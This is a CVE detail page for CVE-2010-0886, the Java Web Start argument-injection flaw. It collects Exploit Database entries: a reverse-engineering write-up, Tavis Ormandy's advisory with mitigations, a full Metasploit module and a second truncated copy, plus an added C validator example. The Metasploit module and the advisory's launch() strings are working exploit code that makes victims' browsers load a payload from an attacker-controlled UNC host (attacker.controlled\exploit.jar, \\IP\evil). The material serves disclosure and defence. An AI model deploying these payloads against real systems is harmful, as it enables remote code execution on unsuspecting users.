CVE-2010-0886 : Detail

CVE-2010-0886

EPSS: 41.51%
Attack vector: Network
Published: 2010-04-20 17h00 +00:00
Last modified: 2018-10-10 16h57 +00:00

CVE description

Unspecified vulnerability in the Java Deployment Toolkit component in Oracle Java SE and Java for Business JDK and JRE 6 Update 10 through 19 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.

CVE information

Related weaknesses

CWE-ID      Weakness name      Source
CWE-Other   No information.

Metrics

Metric   Score   Severity   CVSS vector                     Source
V2       10.0    High       AV:N/AC:L/Au:N/C:C/I:C/A:C      [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood that a vulnerability will be exploited.

EPSS score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that the vulnerability will be exploited.

EPSS percentile

The percentile is used to rank CVEs by their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of all other CVEs. The percentile therefore compares one CVE's EPSS score against the others.

Exploit information

Exploit Database EDB-ID : 12122

Publication date : 2010-04-08 22h00 +00:00
Author : Ruben Santamarta
EDB verified : Yes

Bye bye my little 0day :(, Tavis Ormandy did a great job uncovering a big logic flaw within Java JRE. I discovered that bug and another that affects every browser a few weeks ago and I posted the common "0day++" tweet.

The method in which Java Web Start support has been added to the JRE is not less than a deliberately embedded backdoor (I really don't think so) or a flagrant case of extreme negligence (+1). Let's see:

Java Plugin for Browsers (Chrome, Firefox...) - Windows: npjp2.dll (the same for IE8's jp2iexp.dll)

.text:6DAA3D96
.text:6DAA3D96 ; =============== S U B R O U T I N E =======================================
.text:6DAA3D96
.text:6DAA3D96 ; Attributes: bp-based frame
.text:6DAA3D96
.text:6DAA3D96 sub_6DAA3D96 proc near                  ; CODE XREF: sub_6DAA2ACB+170p
.text:6DAA3D96
.text:6DAA3D96 Data              = byte ptr -264h
.text:6DAA3D96 var_263           = byte ptr -263h
.text:6DAA3D96 ApplicationName   = byte ptr -160h
.text:6DAA3D96 StartupInfo       = _STARTUPINFOA ptr -5Ch
.text:6DAA3D96 ProcessInformation= _PROCESS_INFORMATION ptr -18h
.text:6DAA3D96 cbData            = dword ptr -8
.text:6DAA3D96 hKey              = dword ptr -4
.text:6DAA3D96 arg_0             = dword ptr  8
.text:6DAA3D96 arg_4             = dword ptr  0Ch
.text:6DAA3D96
.text:6DAA3D96     push    ebp
.text:6DAA3D97     mov     ebp, esp
.text:6DAA3D99     sub     esp, 264h
.text:6DAA3D9F     push    edi
.text:6DAA3DA0     lea     eax, [ebp+hKey]
.text:6DAA3DA3     push    eax                     ; phkResult
.text:6DAA3DA4     push    20019h                  ; samDesired
.text:6DAA3DA9     xor     edi, edi
.text:6DAA3DAB     push    edi                     ; ulOptions
.text:6DAA3DAC     push    offset SubKey           ; "JNLPFile\\Shell\\Open\\Command"
.text:6DAA3DB1     push    80000000h               ; hKey
.text:6DAA3DB6     mov     [ebp+cbData], 104h
.text:6DAA3DBD     call    ds:RegOpenKeyExA
.text:6DAA3DC3     test    eax, eax
.text:6DAA3DC5     jz      short loc_6DAA3DCE
.text:6DAA3DC7     xor     eax, eax
.text:6DAA3DC9     jmp     loc_6DAA3F16

The default handler is "javaws.exe", continuing...

.text:6DAA3EB7     push    [ebp+arg_4]
.text:6DAA3EBA     push    eax
.text:6DAA3EBB     push    offset aSDocbaseSS      ; "\"%s\" -docbase %s %s"
.text:6DAA3EC0     push    esi                     ; LPSTR
.text:6DAA3EC1     call    ebx                     ; wsprintfA
.text:6DAA3EC3     add     esp, 14h
.text:6DAA3EC6     jmp     short loc_6DAA3ED4
.text:6DAA3EC8 ; ---------------------------------------------------------------------------
.text:6DAA3EC8
.text:6DAA3EC8 loc_6DAA3EC8:                           ; CODE XREF: sub_6DAA3D96+11Fj
.text:6DAA3EC8     push    eax
.text:6DAA3EC9     push    offset aSS_0            ; "\"%s\" %s"
.text:6DAA3ECE     push    esi                     ; LPSTR
.text:6DAA3ECF     call    ebx                     ; wsprintfA
.text:6DAA3ED1     add     esp, 10h
.text:6DAA3ED4
.text:6DAA3ED4 loc_6DAA3ED4:                           ; CODE XREF: sub_6DAA3D96+130j
.text:6DAA3ED4     push    11h
.text:6DAA3ED6     pop     ecx
.text:6DAA3ED7     xor     eax, eax
.text:6DAA3ED9     lea     edi, [ebp+StartupInfo]
.text:6DAA3EDC     rep stosd
.text:6DAA3EDE     lea     eax, [ebp+ProcessInformation]
.text:6DAA3EE1     push    eax                     ; lpProcessInformation
.text:6DAA3EE2     xor     ebx, ebx
.text:6DAA3EE4     lea     eax, [ebp+StartupInfo]
.text:6DAA3EE7     push    eax                     ; lpStartupInfo
.text:6DAA3EE8     push    ebx                     ; lpCurrentDirectory
.text:6DAA3EE9     push    ebx                     ; lpEnvironment
.text:6DAA3EEA     push    ebx                     ; dwCreationFlags
.text:6DAA3EEB     push    ebx                     ; bInheritHandles
.text:6DAA3EEC     push    ebx                     ; lpThreadAttributes
.text:6DAA3EED     push    ebx                     ; lpProcessAttributes
.text:6DAA3EEE     push    esi                     ; lpCommandLine
.text:6DAA3EEF     lea     eax, [ebp+ApplicationName]
.text:6DAA3EF5     push    eax                     ; lpApplicationName
.text:6DAA3EF6     mov     [ebp+StartupInfo.cb], 44h
.text:6DAA3EFD     call    ds:CreateProcessA

So basically the Java Plugin for browsers is running "javaws.exe" without validating command-line parameters. These parameters can be controlled by attackers via specially crafted embed HTML tags within a webpage.

Let's see JavaDeploy.txt:

if (browser == 'MSIE') {
    document.write('<' + 'object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" ' +
        'width="0" height="0">' +
        '<' + 'PARAM name="launchjnlp" value="' + jnlp + '"' + '>' +
        '<' + 'PARAM name="docbase" value="' + jnlpDocbase + '"' + '>' +
        '<' + '/' + 'object' + '>');
} else if (browser == 'Netscape Family') {
    document.write('<' + 'embed type="application/x-java-applet;jpi-version=' +
        deployJava.firefoxJavaVersion + '" ' +
        'width="0" height="0" ' +
        'launchjnlp="' + jnlp + '"' +
        'docbase="' + jnlpDocbase + '"' +
        ' />');
}

That's it. This is how the Java Plugin identifies Java Web Start content (jnlp files). So we can inject command-line parameters through the "docbase" tag and even "launchjnlp".

What type of arguments can we abuse to compromise a system?

java.exe and javaw.exe support an undocumented, hidden command-line parameter "-XXaltjvm" and, curiously, also "-J-XXaltjvm" (see the -J switch in javaws.exe). This instructs Java to load an alternative JavaVM library (jvm.dll or libjvm.so) from the desired path. Game over. We can set -XXaltjvm=\\IP\evil; in this way javaw.exe will load our evil jvm.dll. Bye bye ASLR, DEP...

Linux: Same logic error, check this function "_Z10launchJNLPPKcS0" in libnpjp2.so

MACOSX: Not vulnerable.

Workaround: Disable javaws/javaws.exe in Linux and Windows by any means. Disable the Deployment Toolkit to avoid unwanted installation as stated in Tavis' advisory.
Exploit Database EDB-ID : 41700

Publication date : 2010-04-08 22h00 +00:00
Author : Metasploit
EDB verified : Yes

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  #
  # This module acts as an HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Sun Java Web Start Plugin Command Line Argument Injection',
      'Description'    => %q{
          This module exploits a flaw in the Web Start plugin component of Sun Java
        Web Start. The arguments passed to Java Web Start are not properly validated.
        By passing the lesser known -J option, an attacker can pass arbitrary options
        directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed
        by Ruben Santamarta, an attacker can execute arbitrary code in the context of
        an unsuspecting browser user.

        This vulnerability was originally discovered independently by both Ruben
        Santamarta and Tavis Ormandy. Tavis reported that all versions since version 6
        Update 10 "are believed to be affected by this vulnerability."

        In order for this module to work, it must be ran as root on a server that does
        not serve SMB. Additionally, the target host must have the WebClient service
        (WebDAV Mini-Redirector) enabled.
      },
      'License'        => MSF_LICENSE,
      'Author'         => 'jduck',
      'References'     =>
        [
          [ 'CVE', '2010-0886' ],
          [ 'CVE', '2010-1423' ],
          [ 'OSVDB', '63648' ],
          [ 'BID', '39346' ],
          [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0122.html' ],
          [ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1' ]
        ],
      'Platform'       => 'win',
      'Payload'        =>
        {
          'Space'          => 1024,
          'BadChars'       => '',
          'DisableNops'    => true,
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"
        },
      'Targets'        =>
        [
          [ 'Automatic', { } ],
          [ 'Java Runtime on Windows x86',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Apr 09 2010'
    ))

    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The daemon port to listen on", 80 ]),
        OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
        OptString.new('UNCPATH', [ false, 'Override the UNC path to use.' ])
      ], self.class)
  end

  def auto_target(cli, request)
    agent = request.headers['User-Agent']
    ret = nil

    #print_status("Agent: #{agent}")

    # Check for MSIE and/or WebDAV redirector requests
    if agent =~ /(Windows NT (5|6)\.(0|1|2)|MiniRedir\/(5|6)\.(0|1|2))/
      ret = targets[1]
    elsif agent =~ /MSIE (6|7|8)\.0/
      ret = targets[1]
    else
      print_status("Unknown User-Agent #{agent}")
    end

    ret
  end

  def on_request_uri(cli, request)
    # For this exploit, this does little besides ensures the user agent is a recognized one..
    mytarget = target
    if target.name == 'Automatic'
      mytarget = auto_target(cli, request)
      if (not mytarget)
        send_not_found(cli)
        return
      end
    end

    # Special case to process OPTIONS for /
    if (request.method == 'OPTIONS' and request.uri == '/')
      process_options(cli, request, mytarget)
      return
    end

    # Discard requests for ico files
    if (request.uri =~ /\.ico$/i)
      send_not_found(cli)
      return
    end

    # If there is no subdirectory in the request, we need to redirect.
    if (request.uri == '/') or not (request.uri =~ /\/([^\/]+)\//)
      if (request.uri == '/')
        subdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/'
      else
        subdir = request.uri + '/'
      end
      print_status("Request for \"#{request.uri}\" does not contain a sub-directory, redirecting to #{subdir} ...")
      send_redirect(cli, subdir)
      return
    else
      share_name = $1
    end

    # dispatch WebDAV requests based on method first
    case request.method
    when 'OPTIONS'
      process_options(cli, request, mytarget)
    when 'PROPFIND'
      process_propfind(cli, request, mytarget)
    when 'GET'
      process_get(cli, request, mytarget, share_name)
    when 'PUT'
      print_status("Sending 404 for PUT #{request.uri} ...")
      send_not_found(cli)
    else
      print_error("Unexpected request method encountered: #{request.method}")
    end
  end

  #
  # GET requests
  #
  def process_get(cli, request, target, share_name)
    print_status("Responding to \"GET #{request.uri}\" request")

    # dispatch based on extension
    if (request.uri =~ /\.dll$/i)
      #
      # DLL requests sent by IE and the WebDav Mini-Redirector
      #
      print_status("Sending DLL")

      # Re-generate the payload
      return if ((p = regenerate_payload(cli)) == nil)

      # Generate a DLL based on the payload
      dll_data = generate_payload_dll({ :code => p.encoded })

      # Send it :)
      send_response(cli, dll_data, { 'Content-Type' => 'application/octet-stream' })
    else
      #
      # HTML requests sent by IE and Firefox
      #

      # This could probably use the Host header from the request
      my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']

      # Always prepare the UNC path, even if we dont use it for this request...
      if (datastore['UNCPATH'])
        unc = datastore['UNCPATH'].dup
      else
        unc = "\\\\" + my_host + "\\" + share_name
      end

      jnlp = "-J-XXaltjvm=" + unc + " -Xnosplash " + rand_text_alphanumeric(8+rand(8)) + ".jnlp"
      docbase = rand_text_alphanumeric(8+rand(8))

      # Provide the corresponding HTML page...
      if (request.uri =~ /\.shtml/i)
        print_status("Sending JS version HTML")

        # Javascript version...
        var_str = rand_text_alpha(8+rand(8))
        var_obj = rand_text_alpha(8+rand(8))
        var_obj2 = rand_text_alpha(8+rand(8))
        var_obj3 = rand_text_alpha(8+rand(8))

        js_jnlp = "http: "
        js_jnlp << jnlp.dup.gsub("\\", "\\\\\\\\") # jeez

        # The 8ad.. CLSID doesn't support the launch method ...
        #clsid = '8AD9C840-044E-11D1-B3E9-00805F499D93'
        clsid = 'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA'

        html = %Q|<html>
<body>Please wait...
<script language="javascript">
var #{var_str} = "#{js_jnlp}";
if (window.navigator.appName == "Microsoft Internet Explorer") {
  var #{var_obj} = document.createElement("OBJECT");
  #{var_obj}.classid = "clsid:#{clsid}";
  #{var_obj}.launch(#{var_str});
} else {
  try {
    var #{var_obj2} = document.createElement("OBJECT");
    #{var_obj2}.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
    document.body.appendChild(#{var_obj2});
    #{var_obj2}.launch(#{var_str});
  } catch (e) {
    var #{var_obj3} = document.createElement("OBJECT");
    #{var_obj3}.type = "application/java-deployment-toolkit";
    document.body.appendChild(#{var_obj3});
    #{var_obj3}.launch(#{var_str});
  }
}
</script>
</body>
</html>
|

      elsif (request.uri =~ /\.htm/i)
        print_status("Sending non-JS version HTML")

        clsids = [
          '8AD9C840-044E-11D1-B3E9-00805F499D93',
          'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA'
        ]
        clsid = clsids[rand(clsids.length)]

        html = %Q|<html>
<body>Please wait...
<object id="#{var_obj}" classid="clsid:#{clsid}" width="0" height="0">
<PARAM name="launchjnlp" value="#{jnlp}">
<PARAM name="docbase" value="#{docbase}">
</object>
<embed type="application/x-java-applet" width="0" height="0"
  launchjnlp="#{jnlp}" docbase="#{docbase}" />
</body>
</html>
|

      else
        print_status("Sending js detection HTML")

        # NOTE: The JS version is preferred to the HTML version since it works on more JRE versions
        js_uri = rand_text_alphanumeric(8+rand(8)) + ".shtml"
        no_js_uri = rand_text_alphanumeric(8+rand(8)) + ".htm"

        html = %Q|<html>
<head>
<meta http-equiv="refresh" content="2;#{no_js_uri}" />
</head>
<body>
Please wait...
<script language="javascript">
document.location = "#{js_uri}";
</script>
</body>
</html>
|
      end # end of detection html

      send_response_html(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })
    end
  end

  #
  # OPTIONS requests sent by the WebDav Mini-Redirector
  #
  def process_options(cli, request, target)
    print_status("Responding to WebDAV \"OPTIONS #{request.uri}\" request")

    headers = {
      #'DASL'   => '<DAV:sql>',
      #'DAV'    => '1, 2',
      'Allow'  => 'OPTIONS, GET, PROPFIND',
      'Public' => 'OPTIONS, GET, PROPFIND'
    }
    send_response(cli, '', headers)
  end

  #
  # PROPFIND requests sent by the WebDav Mini-Redirector
  #
  def process_propfind(cli, request, target)
    path = request.uri
    print_status("Received WebDAV \"PROPFIND #{request.uri}\" request")
    body = ''

    if (path =~ /\.dll$/i)
      # Response for the DLL
      print_status("Sending DLL multistatus for #{path} ...")
      #<lp1:getcontentlength>45056</lp1:getcontentlength>
      body = %Q|<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype/>
<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>
<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>
<lp1:getetag>"39e0132-b000-43c6e5f8d2f80"</lp1:getetag>
<lp2:executable>F</lp2:executable>
<D:lockdiscovery/>
<D:getcontenttype>application/octet-stream</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>
|
    elsif (path =~ /\/$/) or (not path.sub('/', '').index('/'))
      # Response for anything else (generally just /)
      print_status("Sending directory multistatus for #{path} ...")
      body = %Q|<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype><D:collection/></lp1:resourcetype>
<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>
<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>
<lp1:getetag>"39e0001-1000-4808c3ec95000"</lp1:getetag>
<D:lockdiscovery/>
<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>
|
    else
      print_status("Sending 404 for #{path} ...")
      send_not_found(cli)
      return
    end

    # send the response
    resp = create_response(207, "Multi-Status")
    resp.body = body
    resp['Content-Type'] = 'text/xml'
    cli.send_response(resp)
  end

  #
  # Make sure we're on the right port/path to support WebDAV
  #
  def exploit
    if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
      fail_with(Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
    end

    super
  end

end
Exploit Database EDB-ID : 12117

Publication date : 2010-04-08 22h00 +00:00
Author : Tavis Ormandy
EDB verified : Yes

Java Deployment Toolkit Performs Insufficient Validation of Parameters
-------------------------------------------------------------------------

Java Web Start (henceforth, jws) provides java developers with a way to let users launch and install their applications using a URL to a Java Networking Launching Protocol (.jnlp) file (essentially some xml describing the program).

Since Java 6 Update 10, Sun has distributed an NPAPI plugin and ActiveX control called "Java Deployment Toolkit" to provide developers with a simpler method of distributing their applications to end users. This toolkit is installed by default with the JRE and marked safe for scripting.

The launch() method provided by the toolkit object accepts a URL string, which it passes to the registered handler for JNLP files, which by default is the javaws utility.

$ cmd /c ver
Microsoft Windows XP [Version 5.1.2600]
$ java -version
java version "1.6.0_19"
Java(TM) SE Runtime Environment (build 1.6.0_19-b04)
Java HotSpot(TM) Client VM (build 16.2-b04, mixed mode, sharing)
$ cat /proc/registry/HKEY_LOCAL_MACHINE/SOFTWARE/Classes/JNLPFile/Shell/Open/Command/\@
"C:\Program Files\Java\jre6\bin\javaws.exe" "%1"

The toolkit provides only minimal validation of the URL parameter, allowing us to pass arbitrary parameters to the javaws utility, which provides enough functionality via command line arguments to allow this error to be exploited.

The simplicity with which this error can be discovered has convinced me that releasing this document is in the best interest of everyone except the vendor.

-------------------- Affected Software ------------------------

All versions since Java SE 6 update 10 for Microsoft Windows are believed to be affected by this vulnerability. Disabling the java plugin is not sufficient to prevent exploitation, as the toolkit is installed independently.

http://java.sun.com/javase/6/docs/technotes/guides/jweb/deployment_advice.html

I believe non-Windows installations are unaffected.

-------------------- Consequences -----------------------

Exploitation of this issue is not terribly exciting, but is potentially of high enough impact to merit explanation. The javaws application supports the following command line parameters.

$ javaws -help
Usage:  javaws [run-options] <jnlp-file>
        javaws [control-options]

where run-options include:
  -verbose              display additional output
  -offline              run the application in offline mode
  -system               run the application from the system cache only
  -Xnosplash            run without showing a splash screen
  -J<option>            supply option to the vm
  -wait                 start java process and wait for its exit

control-options include:
  -viewer               show the cache viewer in the java control panel
  -uninstall            remove all applications from the cache
  -uninstall <jnlp-file>
                        remove the application from the cache
  -import [import-options] <jnlp-file>
                        import the application to the cache

import-options include:
  -silent               import silently (with no user interface)
  -system               import application into the system cache
  -codebase <url>       retrieve resources from the given codebase
  -shortcut             install shortcuts as if user allowed prompt
  -association          install associations as if user allowed prompt

Perhaps the most interesting of these is -J, and the obvious attack is simply to add -jar followed by an attacker controlled UNC path to the jvm command line, which I've demonstrated below. Other attacks are clearly possible, but this is sufficient to demonstrate the problem.

In order to trigger this attack in Internet Explorer, an attacker would use a code sequence like this

/* ... */
var o = document.createElement("OBJECT");
o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
o.launch("http: -J-jar -J\\\\attacker.controlled\\exploit.jar none");
/* ... */

Or, for Mozilla Firefox

/* ... */
var o = document.createElement("OBJECT");
o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit"
document.body.appendChild(o);
o.launch("http: -J-jar -J\\\\attacker.controlled\\exploit.jar none");
/* ... */

Please note, at some point the registered MIME type was changed to application/java-deployment-toolkit, please verify which type applies to your users when verifying any mitigation implemented has been effective (the simplest way would be to look at the output of about:plugins on a reference machine).

A harmless demonstration is provided below.

http://lock.cmpxchg8b.com/bb5eafbc6c6e67e11c4afc88b4e1dd22/testcase.html

<html>
<head><title>Java Deployment Toolkit Test Page</title></head>
<body>
<script>
// Tavis Ormandy <[email protected]>, April 2010
var u = "http: -J-jar -J\\\\lock.cmpxchg8b.com\\calc.jar none";

if (window.navigator.appName == "Microsoft Internet Explorer") {
    var o = document.createElement("OBJECT");
    o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
    // Trigger the bug
    o.launch(u);
} else {
    // Mozilla
    var o = document.createElement("OBJECT");
    var n = document.createElement("OBJECT");
    o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
    n.type = "application/java-deployment-toolkit";
    document.body.appendChild(o);
    document.body.appendChild(n);
    // Test both MIME types
    try {
        // Old type
        o.launch(u);
    } catch (e) {
        // New type
        n.launch(u);
    }
}
// Bonus Vulnerability, why not downgrade victim to a JRE vulnerable to
// this classic exploit?
// http://sunsolve.sun.com/search/document.do?assetkey=1-66-244991-1
// o.installJRE("1.4.2_18");
</script>
</body>
</html>

------------------- Mitigation -----------------------

If you believe your users may be affected, you should consider applying one of the workarounds described below as a matter of urgency.

- Internet Explorer users can be protected by temporarily setting the killbit on CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA. To the best of my knowledge, the deployment toolkit is not in widespread usage and is unlikely to impact end users.

- Mozilla Firefox and other NPAPI based browser users can be protected using File System ACLs to prevent access to npdeploytk.dll. These ACLs can also be managed via GPO.

Detailed documentation on killbits is provided by Microsoft here

http://support.microsoft.com/kb/240797

Domain administrators can deploy killbits and File System ACLs using GPOs, for more information on Group Policy, see Microsoft's Group Policy site, here

http://technet.microsoft.com/en-us/windowsserver/bb310732.aspx

You may be tempted to kill the HKLM\...\JNLPFile\Shell\Open\Command key, but the author does not believe this is sufficient, as the plugin also provides enough functionality to install and downgrade JRE installations without prompting (seriously). However, if none of your affected users are local Administrators, this solution may work (untested).

As always, if you do not require this feature, consider permanently disabling it in order to reduce attack surface.

------------------- Solution -----------------------

Sun has been informed about this vulnerability, however, they informed me they do not consider this vulnerability to be of high enough priority to break their quarterly patch cycle. For various reasons, I explained that I did not agree, and intended to publish advice to temporarily disable the affected control until a solution is available.

------------------- Credit -----------------------

This bug was discovered by Tavis Ormandy. This work is my own, and all of the opinions expressed are mine, not my employer's or anybody else's (I added this for you, Dan. Thanks ;-)).

------------------- Greetz -----------------------

Greetz to Julien, Neel, Redpig, Lcamtuf, Spoonm, Skylined, asiraP, LiquidK, ScaryBeasts, Headhntr, Jagger, Sami and Roach.

Some very elite friends have started a consultancy called inverse path, you should really hire them.

http://www.inversepath.com/

------------------- References -----------------------

- Deploying Java with JNLP, Sun Microsystems.
  http://java.sun.com/developer/technicalArticles/Programming/jnlp/

------------------- Notes -----------------------

My advisories are intended to be consumed by a technical audience of security professionals and systems administrators who are familiar with the principle for which the mailing list you have subscribed to is named. If you do not fall into this category, you can get up to speed by reading this accessible and balanced essay on the disclosure debate by Bruce Schneier.

http://www.schneier.com/crypto-gram-0111.html#1

Some of us would appreciate it if you made the effort to research and understand the issues involved before condemning us :-)
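The two write-ups above describe the same sink from two sides: Santamarta's disassembly shows npjp2.dll splicing the launchjnlp/docbase values into a command line with wsprintfA("\"%s\" -docbase %s %s", ...) and handing it to CreateProcessA, and Ormandy shows that a launch() URL such as "http: -J-jar -J\\attacker\exploit.jar none" therefore reaches javaws as several arguments, one of which is the -J VM option. The C program below is an added example, not code from either advisory or from the JRE: it models the vulnerable builder with the two format strings seen in the disassembly, tokenizes the result the way a Windows command-line parser would, and shows the input check the plugin should have applied before spawning the handler. The function names, the sample URLs and the Windows-style tokenizer (quotes only, no backslash escaping) are this example's own assumptions; the real CreateProcessA call is replaced by string handling so the program runs anywhere.

```c
/* Added example (not the JRE's code and not from EDB-12122 or EDB-12117).
 * Models how a launcher that splices a caller-supplied JNLP URL into a
 * command line is abused, and how the sink should validate its input.
 * The format strings mirror Ruben Santamarta's disassembly of npjp2.dll;
 * the function names, tokenizer and sample URLs are hypothetical. */
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define MAX_ARGS 16
#define MAX_ARG_LEN 256

/* Vulnerable builder: mirrors wsprintfA("\"%s\" -docbase %s %s", ...) when a
 * docbase is present and wsprintfA("\"%s\" %s", ...) otherwise.  The URL is
 * neither quoted nor checked, so whitespace inside it yields new arguments. */
static int build_javaws_cmdline(char *out, size_t outsz, const char *javaws,
                                const char *docbase, const char *url)
{
    if (docbase && *docbase)
        return snprintf(out, outsz, "\"%s\" -docbase %s %s", javaws, docbase, url);
    return snprintf(out, outsz, "\"%s\" %s", javaws, url);
}

/* Minimal Windows-style tokenizer (assumption: whitespace separates
 * arguments, double quotes group text, no backslash escaping).
 * Returns the number of arguments stored in argv. */
static int split_cmdline(const char *cmdline, char argv[][MAX_ARG_LEN], int max_args)
{
    int argc = 0;
    const char *p = cmdline;
    while (*p && argc < max_args) {
        while (*p && isspace((unsigned char)*p)) p++;
        if (!*p) break;
        size_t n = 0;
        bool in_quote = false;
        while (*p && (in_quote || !isspace((unsigned char)*p))) {
            if (*p == '"') in_quote = !in_quote;
            else if (n < MAX_ARG_LEN - 1) argv[argc][n++] = *p;
            p++;
        }
        argv[argc][n] = '\0';
        argc++;
    }
    return argc;
}

/* Counts the arguments javaws would hand to the VM as -J options. */
static int count_injected_vm_options(const char *cmdline)
{
    char argv[MAX_ARGS][MAX_ARG_LEN];
    int argc = split_cmdline(cmdline, argv, MAX_ARGS);
    int hits = 0;
    for (int i = 1; i < argc; i++)
        if (strncmp(argv[i], "-J", 2) == 0) hits++;
    return hits;
}

/* Builds the command line for one URL and reports how many -J options leak through. */
static int injected_options_for_url(const char *docbase, const char *url)
{
    char cmd[1024];
    build_javaws_cmdline(cmd, sizeof cmd,
                         "C:\\Program Files\\Java\\jre6\\bin\\javaws.exe", docbase, url);
    return count_injected_vm_options(cmd);
}

/* Hardened check the plugin should have run before spawning the handler:
 * only an http(s) URL with no whitespace, control characters or quotes is
 * accepted, so it can never be parsed as more than one argument or as an
 * option.  Rejecting a leading '-' falls out of the scheme check. */
static bool jnlp_url_is_safe(const char *url)
{
    if (!url) return false;
    if (strncmp(url, "http://", 7) != 0 && strncmp(url, "https://", 8) != 0)
        return false;
    for (const char *p = url; *p; p++) {
        unsigned char c = (unsigned char)*p;
        if (c <= 0x20 || c == 0x7f || c == '"') return false;
    }
    return true;
}

int main(void)
{
    /* Constructed sample: the URL string from Ormandy's test page. */
    const char *evil = "http: -J-jar -J\\\\attacker.controlled\\exploit.jar none";
    const char *good = "http://example.invalid/app.jnlp";
    char cmd[1024];
    build_javaws_cmdline(cmd, sizeof cmd,
                         "C:\\Program Files\\Java\\jre6\\bin\\javaws.exe", NULL, evil);
    printf("%s\n-> %d injected -J option(s)\n", cmd, count_injected_vm_options(cmd));
    printf("validator: evil=%d good=%d\n", jnlp_url_is_safe(evil), jnlp_url_is_safe(good));
    return 0;
}
```

Build with `cc -std=c11 -Wall example.c` and run it; the first line of output is the command line javaws would have received, with "-J-jar" and "-J\\attacker.controlled\exploit.jar" as separate tokens. The validator is deliberately a whitelist: it accepts only the shape the handler needs (an http or https URL with no separators), rather than trying to blacklist "-J", because javaws accepts other options and a blacklist would have to track all of them.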
Exploit Database EDB-ID : 16585

Publication date : 2010-09-20 22h00 +00:00
Author : Metasploit
EDB verified : Yes

##
# $Id: java_ws_arginject_altjvm.rb 10404 2010-09-21 00:13:30Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  #
  # This module acts as an HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Sun Java Web Start Plugin Command Line Argument Injection',
      'Description'    => %q{
          This module exploits a flaw in the Web Start plugin component of Sun Java
        Web Start. The arguments passed to Java Web Start are not properly validated.
        By passing the lesser known -J option, an attacker can pass arbitrary options
        directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed
        by Ruben Santamarta, an attacker can execute arbitrary code in the context of
        an unsuspecting browser user.

        This vulnerability was originally discovered independently by both Ruben
        Santamarta and Tavis Ormandy. Tavis reported that all versions since version 6
        Update 10 "are believed to be affected by this vulnerability."

        In order for this module to work, it must be ran as root on a server that does
        not serve SMB. Additionally, the target host must have the WebClient service
        (WebDAV Mini-Redirector) enabled.
      },
      'License'        => MSF_LICENSE,
      'Author'         => 'jduck',
      'Version'        => '$Revision: 10404 $',
      'References'     =>
        [
          [ 'CVE', '2010-0886' ],
          [ 'OSVDB', '63648' ],
          [ 'BID', '39346' ],
          [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0122.html' ],
          [ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1' ]
        ],
      'Platform'       => 'win',
      'Payload'        =>
        {
          'Space'          => 1024,
          'BadChars'       => '',
          'DisableNops'    => true,
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"
        },
      'Targets'        =>
        [
          [ 'Automatic', { } ],
          [ 'Java Runtime on Windows x86',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ],
